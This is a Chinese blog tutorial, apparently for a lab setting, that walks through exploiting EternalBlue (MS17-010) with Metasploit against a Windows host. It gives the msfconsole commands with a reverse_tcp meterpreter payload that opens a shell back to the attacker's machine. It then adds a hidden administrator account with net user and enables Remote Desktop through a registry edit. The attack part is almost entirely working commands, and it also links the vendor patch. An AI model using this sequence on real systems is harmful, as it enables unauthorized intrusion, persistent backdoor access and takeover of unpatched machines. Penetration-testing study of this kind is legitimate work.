利用msf的ms17_010模块提权

编辑

其实啊,这个东西没什么用

先参考下,更新补丁下载更新吧,几乎在座各位用的系统都有影响。(没补丁前)    https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

先启动msf

msfconsole
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue //使用模块
show options //查看必要参数

1.PNG

set RHOST 192.168.1.100
set LHOST 192.168.1.132 //攻击机ip
set payload windows/x64/meterpreter/reverse_tcp //使用这个东西
run

2.PNG

5.PNG

cmd添加用户(不知道什么意思可以百度)

net user abc qwe+123 /add
net localgroup administrators abc /add

6.PNG

7.PNG

cmd写入注册表开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

8.PNG

接下来用刚刚创建的用户远程连接靶机

10.PNG

11.PNG

12.PNG

本文参考:

https://zhidao.baidu.com/question/128762189.html



kail除了msf还有很多工具,有兴趣自己了解。。。。推荐书本《Metasploit渗透测试魔鬼训练营》

本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!

评论区

暂无评论,快来抢沙发